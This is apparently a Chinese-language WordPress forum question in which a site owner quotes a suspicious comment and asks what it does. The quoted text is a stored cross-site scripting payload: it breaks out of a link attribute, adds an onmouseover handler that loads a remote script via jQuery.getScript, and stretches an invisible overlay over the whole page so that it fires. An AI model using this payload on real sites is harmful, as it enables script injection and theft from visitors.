WordPress: 有人在评论里插入一段jQuery.getScript

看起来只有
[[” ]
不知道何意，应该是一段恶意代码。
[<a href="#" title="]" rel="nofollow"></a>[" <!-- onmouseover=jQuery.getScript('http://localhost/recieve.php') style="text-decoration:none;display:block;width:3000px;height:3000px;position:absolute;top:0px;left:0px;//> --><a></a>]